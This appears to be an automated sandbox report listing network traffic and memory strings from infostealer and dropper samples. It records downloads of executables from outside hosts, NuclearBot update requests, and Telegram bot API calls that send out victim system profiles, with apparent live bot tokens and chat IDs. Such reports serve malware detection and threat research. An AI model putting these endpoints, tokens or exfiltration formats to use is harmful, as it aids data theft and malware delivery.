Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202024-07-06%207:27:22%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20134349%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%201BUBDD%0ARAM:%204095MB%0AHWID:%209C8FCB6779%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202024-07-06%207:27:25%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20134349%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%201BUBDD%0ARAM:%204095MB%0AHWID:%209C8FCB6779%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /raw/7B75u64B HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/7B75u64B HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api/update.pack HTTP/1.1User-Agent: NuclearBotHost: auth.xn--conbase-sfb.xyzCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/update2.pack HTTP/1.1User-Agent: NuclearBotHost: auth.xn--conbase-sfb.xyzCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /Installer.exe HTTP/1.1Host: www.igenius.orgPragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: CasperSecurity
Source: global traffic	HTTP traffic detected: GET /Server.exe HTTP/1.1Host: hrdc.pkPragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: CasperSecurity
Source: global traffic	HTTP traffic detected: GET /Server.exe HTTP/1.1Host: www.igenius.orgPragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: CasperSecurity
Source: global traffic	HTTP traffic detected: GET /Server.exe HTTP/1.1Host: www.igenius.orgPragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: CasperSecurity
Source: global traffic	HTTP traffic detected: GET /Client.exe HTTP/1.1Host: www.igenius.orgPragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: CasperSecurity
Source: global traffic	HTTP traffic detected: GET /update.exe HTTP/1.1Host: www.igenius.orgPragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: CasperSecurity
Source: global traffic	HTTP traffic detected: GET /update.exe HTTP/1.1Host: www.igenius.orgPragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: CasperSecurity
Source: global traffic	HTTP traffic detected: GET /wp-admin/css/colors/ocean/grab.exe HTTP/1.1Host: www.westnilebirdingandsafari.comPragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: CasperSecurity
Source: global traffic	HTTP traffic detected: GET /aaa.exe HTTP/1.1Host: www.igenius.orgPragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: CasperSecurity
Source: global traffic	HTTP traffic detected: GET /build.exe HTTP/1.1Host: www.igenius.orgPragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: CasperSecurity
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.com

Source: global traffic	DNS traffic detected: DNS query: auth.xn--conbase-sfb.xyz
Source: global traffic	DNS traffic detected: DNS query: www.igenius.org
Source: global traffic	DNS traffic detected: DNS query: hrdc.pk
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: dl.dropboxusercontent.com
Source: global traffic	DNS traffic detected: DNS query: freegeoip.app
Source: global traffic	DNS traffic detected: DNS query: ipbase.com
Source: global traffic	DNS traffic detected: DNS query: www.westnilebirdingandsafari.com
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: 205.12.2.0.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: icanhazip.com
Source: global traffic	DNS traffic detected: DNS query: api.mylnikov.org
Source: global traffic	DNS traffic detected: DNS query: pastebin.com

Source: unknown

HTTP traffic detected: POST /bot7203427100:AAE4oxY4yahcr0ruK5AXnOIUYn1d9UmUZqs/sendDocument?chat_id=-4206528371&caption=====%20RL%20STEALER%20====%20%0A%E2%8F%B0%20Date%20=%3E%2007/06/2024%207:27%0A%F0%9F%92%BBSystem%20=%3E%20Windows%2010%20Pro%20(64%20Bit)%0A%F0%9F%91%A4%20User%20=%3E%20user%0A%F0%9F%86%94%20PC%20=%3E%20134349%0A%F0%9F%8F%B4%20Country%20=%3E%20[United%20States]%0A%F0%9F%94%8D%20IP%20=%3E%208.46.123.33%0A%F0%9F%93%9D%20Language%20=%3E%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0A%F0%9F%94%93%20Antivirus%20=%3E%20Windows%20Defender.%0A%20====%7B%20User%20Data%20%7D====%0A%F0%9F%93%82%20FileGrabber%20=%3E%2081%0A%F0%9F%93%A6%20Telegram%20=%3E%20%E2%9D%8C%0A%F0%9F%92%B8%20Wallets%20=%3E%20%E2%9D%8C%0A%F0%9F%92%AC%20Discord%20=%3E%20%E2%9D%8C%0A%F0%9F%93%A1%20FileZilla:%20%E2%9D%8C%0A%20VimeWorld%20=%3E%20%E2%9D%8C%0A%20====%7B%20VPN%20%7D====%0A%20%E2%88%9F%20NordVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20OpenVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20ProtonVPN%20=%3E%20%E2%9D%8C%0A%20====%7B%20Browsers%20Data%20%7D====%0A%F0%9F%97%9D%20Passwords%20=%3E%200%0A%F0%9F%95%91%20History%20=%3E%209%0A%F0%9F%8D%AA%20Cookies%20=%3E%200%0A%F0%9F%93%9D%20AutoFills%20=%3E%200%0A%F0%9F%92%B3%20CC%20=%3E%200%0A%20====%7B%20Gaming%20%7D====%0A%20%F0%9F%8E%AE%20Steam%20=%3E%20%E2%9D%8C%0A%20==================%0A%20DOMAINS%20DETECTED:%0A%20-%20 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dc9ea4f458eb80Host: api.telegram.orgContent-Length: 674280Expect: 100-continueConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:27:21 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 67cfd327a89144d898cb8e260c519356Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:27:21 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 070ae673771847d5ae90f26a1e675131Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Jul 2024 11:27:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 0Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; fwd=missVary: Accept-EncodingX-Nf-Request-Id: 01J23WRXZC0BM4165B5GPY1TFECF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6UZrlvMPaDSEnXkSG0na44T4RaaVoVJuAy5tb8vAOvgyXsnn5QpS51%2B4%2Fh97bvolDxS4QcDEQ0h7X83MUaaO%2Fo%2BrE6HS9n%2FoXC4HgS5RM48xBA5mi2FRCMwRMN44"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89ef3ec62affc454-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:27:23 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 6246558552fc497ea997b7ceeb858b05Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:27:23 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: b02ec5d1db054e08a299c1bb129ccbecConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:27:24 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 3fe90cbb8d934200afd5692c2a9f517eConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:27:25 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 5ac34c91208a4ed68d1539c76461bd4dConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:27:26 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 19257cddd1964a18937af02c4451b113Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:27:27 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: e45280295d66465c8ce5cde1d8f2f655Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:27:29 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 7844d9b610e94b3e9958b7e12e5481b1Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:27:30 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 9367e727cb7140928822be84efec2857Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:27:31 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: fc26f50bdac0430aa2363f38f94c5dfbConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:27:32 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: e980e04bf9cd4687969381d14d820f3bConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:28:28 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 4940563c263a4ed3b37c3a86e8dbeffcConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:28:28 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: e52878a685204f45bccfbb878255493bConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Jul 2024 11:28:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 50755Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J23WTYW1WES339EJ18E99HNPCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xDDK09sas0hEkzBID3%2BV004n7lwwGklSht2LAABLcpqI30Ljl5Xa4KTbAnhKSReO9QOw7cF96foreNRVbTWde7QfcCUmLDeDvDnByblnH8hswsz2snMBnM4Gnyko"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89ef406588498cc0-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:28:29 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 48d04f92f1ac43199464af56a5d91cbcConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:28:30 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 46ad6b05262e4619b51ae914000086daConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:28:31 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 4069f037958a44debf9ed35c1cac595eConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:28:31 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: f43c932cfa484fca9fc7ff80a7acadfaConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:28:32 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 1e8c8e9e1b2e44389c706f2a5c52b53cConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:28:34 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 67908c3c3d004af39cf20834f79e4f2bConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:28:35 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: cd1660047af542a6a6de914b17b29109Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:28:37 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: b9ae42e604aa4066aa9d8799a78b39adConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:28:38 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 963840405bcb441eb4550f06d4fd0515Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sat, 06 Jul 2024 11:28:40 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: d3386346e32345819c3a4031911030dcConnection: close

Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003665000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003665000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.orgd
Source: 3CBD.tmp.Installer.exe, 00000005.00000002.1941590624.00000000034B6000.00000004.00000800.00020000.00000000.sdmp, 4336.tmp.Server.exe, 00000006.00000002.3152347475.00000000025CF000.00000004.00000800.00020000.00000000.sdmp, 4336.tmp.Server.exe, 00000006.00000002.3152347475.0000000002A48000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002E92000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.00000000030F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: 4336.tmp.Server.exe, 00000006.00000002.3152347475.00000000025CF000.00000004.00000800.00020000.00000000.sdmp, 4336.tmp.Server.exe, 00000006.00000002.3152347475.0000000002A48000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002E92000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.00000000030F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.orgd
Source: relog.exe, relog.exe, 00000037.00000002.2852161070.0000023277640000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://auth.xn--conbase-sfb.xyz/api/update.pack
Source: xj40xovMsm.exe, 00000019.00000002.2617932750.00000229B8CB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://auth.xn--conbase-sfb.xyz/api/update.packP
Source: xj40xovMsm.exe, Service_{B955B2CC07A01546086603}.exe.25.dr, zbi[1].exe.0.dr, Service_Microsoft.exe.0.dr, zbi[1].exe.25.dr, Service_Skype.exe.0.dr, Service_Mozilla.exe.0.dr, Service_Adobe.exe.0.dr, {B955B2CC07A01546086603}.exe.0.dr, SystemUpdate.exe.0.dr, Service_com.adobe.dunamis.exe.0.dr, psvhost.exe.0.dr	String found in binary or memory: http://auth.xn--conbase-sfb.xyz/api/update.packhttp://auth.xn--conbase-sfb.xyz/api/update2.packhttp:
Source: Service_{B955B2CC07A01546086603}.exe, 00000034.00000002.2744093338.000002A542926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://auth.xn--conbase-sfb.xyz/api/update.packll
Source: relog.exe, relog.exe, 00000037.00000002.2852161070.0000023277640000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://auth.xn--conbase-sfb.xyz/api/update2.pack
